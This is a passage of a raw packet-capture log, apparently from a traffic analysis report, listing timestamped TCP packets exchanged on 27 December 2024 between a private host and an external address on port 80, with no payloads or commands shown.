                                                        Dec 27, 2024 14:53:41.132353067 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.133548021 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.133681059 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.133724928 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.221949100 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.221986055 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.222168922 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.222289085 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.222393036 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.222451925 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.223603964 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.223721027 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.223774910 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.224766016 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.224881887 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.224936962 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.226037025 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.226142883 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.226186991 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.227359056 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.227408886 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.227463961 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.228562117 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.228662014 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.228705883 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.229820013 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.229909897 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.229973078 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.231113911 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.231241941 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.231288910 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.232321978 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.232431889 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.232470989 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.233644009 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.233716965 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.233762026 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.234853983 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.234961033 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.235002041 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.236073971 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.236171007 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.236213923 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.237329960 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.237425089 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.237466097 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.238629103 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.238701105 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.238749027 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.239911079 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.239998102 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.240036964 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.241092920 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.241188049 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.241235018 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.242363930 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.242497921 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.242564917 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.243618965 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.243716955 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.243757010 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.244961023 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.245050907 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.245094061 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.246133089 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.246280909 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.246323109 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.247369051 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.247478008 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.247523069 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.248624086 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.248730898 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.248773098 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.249902964 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.249952078 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.249990940 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.269512892 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.269593954 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.269644976 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.270085096 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.270174026 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.270210981 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.271265984 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.271379948 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.271424055 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.272428036 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.304884911 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.304912090 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.304955959 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.305525064 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.305563927 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.305607080 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.306679964 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.306719065 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.306843042 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.307866096 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.307903051 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.307988882 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.309036970 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.309077024 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.309149981 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.310225964 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.310272932 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.310308933 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.311407089 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.311451912 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.311490059 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.312586069 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.312627077 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.312714100 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.313802958 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.313848972 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.313920021 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.314986944 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.315023899 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.315090895 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.316184998 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.316221952 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.316251040 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.317354918 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.317394972 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.317475080 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.318583012 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.318624020 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.318654060 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.319749117 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.319787979 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.319834948 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.320924997 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.320964098 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.321037054 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.322170973 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.322210073 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.322251081 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.323328018 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.323369026 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.323420048 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.324522972 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.324562073 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.324621916 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.325700045 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.325741053 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.325762987 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.326889038 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.326927900 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.326989889 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.328062057 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.328098059 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.328167915 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.329293013 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.329333067 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.329363108 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.330457926 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.330498934 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.330538034 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.331666946 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.331703901 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.331780910 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.332845926 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.332887888 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.332928896 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.334008932 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.334050894 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.334130049 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.335206985 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.335218906 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.335243940 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.381356955 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.423523903 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.423554897 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.423721075 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.424042940 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.424199104 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.424237013 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.425225019 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.425441027 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.425479889 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.426441908 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.426534891 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.426569939 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.427620888 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.427722931 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.427759886 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.428808928 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.428931952 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.428967953 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.430047989 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.430102110 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.430135965 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.431377888 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.431473970 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.431514025 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.432394981 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.432533979 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.432569981 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.433579922 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.433676004 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.433717012 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.434776068 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.434833050 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.434868097 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.436113119 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.436233997 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.436275005 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.437129974 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.437227964 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.437279940 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.438347101 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.438437939 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.438476086 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.439527035 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.439615011 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.439651966 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.440712929 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.440856934 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.440888882 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.441919088 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.442012072 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.442048073 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.443106890 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.443273067 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.443310022 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.444263935 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.444372892 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.444406986 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.445465088 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.445509911 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.445544958 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.446683884 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.446734905 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.446773052 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.447881937 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.448076010 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.448113918 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.449024916 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.449115992 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.449151993 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.450176954 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.470750093 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.470823050 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.470840931 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.471318007 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.471353054 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.471405983 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.472497940 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.472532988 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.472949982 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.473057985 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.473090887 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.506232977 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.506318092 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.506371021 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.506751060 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.506876945 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.506912947 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.507949114 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.508069038 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.508105040 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.509155035 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.509275913 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.509308100 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.510359049 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.510464907 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.510500908 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.511532068 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.511637926 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.511674881 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.512733936 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.512850046 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.512885094 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.513977051 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.514053106 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.514101982 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.515145063 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.515300035 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.515336990 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.516285896 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.516417027 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.516450882 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.517431021 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.517638922 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.517673969 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.518655062 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.518769979 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.518801928 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.519874096 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.519956112 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.519987106 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.521042109 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.521181107 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.521215916 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.522223949 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.522329092 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.522360086 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.523412943 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.523519993 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.523566008 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.524600983 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.524730921 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.524766922 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.525780916 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.525903940 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.525939941 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.526969910 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.527082920 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.527117968 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.528189898 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.528281927 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.528315067 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.529398918 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.529541016 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.529577017 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.530596018 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.530693054 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.530730009 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.531743050 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.531847954 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.531884909 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.532936096 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.532989979 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.533027887 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.534118891 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.534245014 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.534279108 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.535326004 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.535435915 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.535474062 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.536494017 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.536530018 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.536566973 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.624627113 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.624713898 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.624769926 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.624937057 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.625044107 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.625081062 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.626132011 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.626225948 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.626260042 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.627324104 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.627413988 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.627449036 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.628494978 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.628607035 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.628643990 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.629709959 CET804972187.120.113.91192.168.2.10
